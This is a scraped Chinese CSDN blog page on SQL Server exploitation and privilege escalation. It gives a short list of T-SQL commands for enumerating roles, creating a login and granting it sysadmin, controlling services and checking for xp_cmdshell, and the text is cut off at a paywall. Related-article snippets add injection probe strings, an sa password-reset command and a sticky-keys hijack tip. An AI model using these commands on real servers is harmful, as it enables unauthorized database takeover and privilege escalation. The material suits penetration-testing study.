SQL server 漏洞利用及提权方式

最新推荐文章于 2023-01-04 09:17:40 发布
最新推荐文章于 2023-01-04 09:17:40 发布
阅读量1.8k 收藏 5
点赞数 1
分类专栏: 提权 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37286368/article/details/107047907
版权

0X01 常见方式

在这里插入图片描述

0X02 常用提权语句

1、查看数据库版本
select @@version
2、查看数据库系统参数
exec master..xp_msver;
3、查看用户所属角色信息
sp_helpsrvrolemember
4、查看当前数据库
select db_name()
5、显示机器上的驱动器
xp_availablemedia
6、查看当前账户权限
select IS_SRVROLEMEMBER('sysadmin')
以下类似serveradmin、setupadmin、securityadmin、diskadmin、bulkadmin 
select IS_MEMBER('db owner')
7、添加用户
exec master..dbo.sp_addlogin test,password #添加用户
exec master..dbo.sp_addsrvrolemember test,sysadmin #加权限
8、启动停止服务
exec master..xp_servicecontrol 'stop','test'
exec master..xp_servicecontrol 'start','test'
9、检查功能
SELECT count(*) FROM master..dbo.sysobjects WHERE name='xp_cmdshell'
xp_cmdshell、xp_regread、sp_makewebtask、xp_subdirs、xp_dirtree、sp_addextendedproc

0X03 XP_cmdshe

最低0.47元/天 解锁文章
WTraveler
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网站sqlserver提权操作
weixin_30839881的博客
12-01 150
在入侵过程中,得到SQLserver的权限,想进一步得到system权限的方法总结 *************************** 利用xp_cmdshell ***********************************一.更改sa口令方法:用sql综合利用工具连接后,执行命令:exec sp_password NULL,'新密码','sa'(提示:慎用!)二.简单修补sa弱口...
SQLServer/MsSql注入漏洞步骤、使用方法
weixin_46928280的博客
07-20 4484
msSQL/SQLserver数据库的使用方法;渗透SQLserver数据库的步骤
sql注入后提权
qq_33441500的博客
12-22 2469
1.发现SQL注入位置 1)整型参数的判断 永假条件:?p=1 and 1=2 永真条件:?p=1 and 1=1 空条件:?p=1 or 1=1 2)字符型参数的判断 永假条件:?p=1’ and ‘1’='2 永真条件:?p=1’ and ‘1’='1 空条件:?p=1’ or ‘1’='1 3)过滤特殊字符的判断 确认过滤了# http://localhost/sqli-labs/Less-...
提权案例(一)渗透某asp.net网站通过sql server数据库public 提权 思路分享
weixin_30699465的博客
05-26 630
先罗列出sql server 角色用户的权限 按照从最低级别角色(bulkadmin)到最高级别角色(sysadmin)的顺序进行描述:1.bulkadmin:这个角色可以运行BULK INSERT语句.该语句允许从文本文件中将数据导入到SQL Server2008数据库中,为需要执行大容量插入到数据库的域帐号而设计.2.dbcreator:这个角色可以创建,更改,删除和还原任何数据库...
WordPress漏洞之————SQL注入漏洞提权分析
Fly_鹏程万里
03-30 5965
威胁响应中心研究员对Wordpress核心功能SQL注入漏洞(编号为CVE-2015-5623和CVE-2015-2213)进行了详细的分析 0x00 漏洞概述 在twitter上看到Wordpress核心功能出现SQL注入漏洞,想学习下,就深入的跟了下代码,结果发现老外留了好大的一个坑。虽然确实存在注入问题,但是却没有像他blog中所说的那样可以通过订阅者这样的低权限来触发SQL注入漏洞...
MySql2005的一个小漏洞
cqwf95925的博客
06-24 113
如果在MySql2005中建一个表,表中的一个字段的类型定义为“float”。例如: create table test ( code integer, num float ) inse...
三步堵死 SQL Server注入漏洞
12-15
SQL注入是什么? 许多网站程序在编写时,没有对用户输入...黑客可以利用获得的管理员权限任意获得网站上的文件或者在网页上加挂木马和各种恶意程序,对网站和访问该网站的网友都带来巨大危害。 防御SQL注入有妙法 第一步
SQLserver 2005 SP3-64位及32位补丁
最新发布
03-16
SQL Server 2005 SP3(Service Pack 3)是微软数据库管理系统SQL Server 2005的一个重要更新版本,旨在提升系统性能、稳定性和安全性。SP3包含了自SQL Server 2005 RTM(Release to Manufacturing)发布以来的所有...
SQL Server降权运行 SQL Server 2000以GUESTS权限运行设置方法
09-10
SQL Server 2000时代,由于系统存在的漏洞,黑客经常利用SQL注入攻击来获取系统的管理员权限。为了防止这种情况,将SQL Server配置为以较低权限如GUESTS组运行,可以限制攻击者一旦入侵数据库后的破坏程度。 首先...
【红蓝对抗】SQL Server提权1
08-03
总的来说,SQL Server提权涉及对系统库、存储过程以及特定扩展存储过程的深入理解和利用。安全人员需要时刻警惕这些风险,确保系统的安全性。同时,作为防御者,应该定期审查权限设置,限制不必要的访问,以降低被...
【菜鸟腾飞】简单的Getshell和windows提权_漏洞研究
11-01
【菜鸟腾飞】简单的Getshell和windows提权_漏洞研究【菜鸟腾飞】简单的Getshell和windows提权_漏洞研究
Win10可用的Microsoft SQL Server 2008 Native Client
03-28
Microsoft SQL Server 2008 Native Client是在Windows 10操作系统上可以使用的数据库连接组件,它为应用程序提供了与SQL Server进行交互的能力。该组件支持多种数据访问接口,如ODBC(Open Database Connectivity)...
Sa提权sql语句大全
weixin_30376509的博客
08-09 173
Sa提权方式很多,而最快捷的方式就是shift粘滞键镜像劫持。这种Sa提权方法必须满足几个条件,数据库可以远程访问,服务器开启了终端远程访问也就是3389和粘滞键功能。这样就可以利用Microsoft SQL Server Management Studio或其他漏洞检测工具来连接远程数据库了。 个人推荐使用Microsoft SQL Server Management Studio,可...
“Roma225”网络间谍活动:利用RevengeRAT瞄准意大利汽车行业
weixin_33709219的博客
01-02 173
最近,Cybaze-Yoroi ZLab的研究人员对一款针对意大利汽车行业的间谍恶意软件进行了分析。该恶意软件是通过钓鱼电子邮件传播的,***者试图伪装成巴西一家知名商业律师事务所的高级合伙人——Veirano Advogados。恶意电子邮件的附件是一个PowerPoint外接程序文件(.ppa文件),包含能够自动运行的VBA宏代码。图1:.ppa文件打开时显示的弹出窗口技...
内网渗透(二)之提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-14 5613
对于内网渗透,到我们拿到了公网主机的权限后,并获得了一些本机的信息时。我们首先得知道我们的权限。如果获取到的是普通用户权限,则我们需要想办法提权至管理员权限。如果获得的已经是管理员权限,则可以忽略这一步。对于Windows系统,只有提权到管理员权限后,才可以运行mimikatz以及执行一些其他高权限的操作。对于Linux系统,很多命令需要root权限才能执行,只有提权到root权限才能执行后面的信息收集等工作。
SQL Server手工注入方式
good good study
01-04 5699
本文详细的介绍了Sql Server安全基础,包括环境搭建,T-sql语法,sqlserver用户权限,以及sqlserver注入的方法和提权方式。 Microsoft SQL Server(微软结构化查询语言服务器),也叫Mssql,是由美国微软公司所推出的关系型数据库。默认端口号为1433常见版本如下版本年份发布名称8.02000年8.02003年SQL Server 2000 64-bit版本9.02005年10.02008年10.252009年SQL Azure。
soap注入某sql2008服务器结合msf进行提权
xiaoi123的博客
06-05 3217
原文作者:陈小兵    在实际成功渗透过程中,漏洞的利用都是多个技术的融合,最新技术的实践,本次渗透利用sqlmap来确认注入点,通过sqlmap来获取webshell,结合msf来进行ms16-075的提权,最终获取了目标服务器的系统权限。本文算是漏洞利用的一个新的拓展,在常规Nday提权不成功的情况下,结合msf进行ms16-075成功提权的一个经典案例。1.1.1扫描soap注入漏洞    ...
MSSQL 漏洞利用提权
weixin_30702413的博客
11-24 888
1、SA口令的获取 webshell或源代码的获取 源代码泄露 嗅探(用CAIN等工具嗅探1433数据库端口) 口令暴力破解 2、常见SQL server 提权命令 查看数据库的版本(select @@version;) 查看数据库所在服务器操作系统的参数 查看数据库启动的参数 查看数据库启动的时间 查看数据库服务器名和实例名 查看用户登录信息 查看数据库里所所有的存储工程...
sqlserver漏洞利用前提
07-16
SQL Server漏洞的利用前提可能包括以下几个方面: 1. 未修补或未时更新的软件版本:攻击者通常会寻找已知的SQL Server漏洞,并尝试利用那些未被修复或未被及时更新的版本。 2. 弱密码或默认凭据:如果SQL Server的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值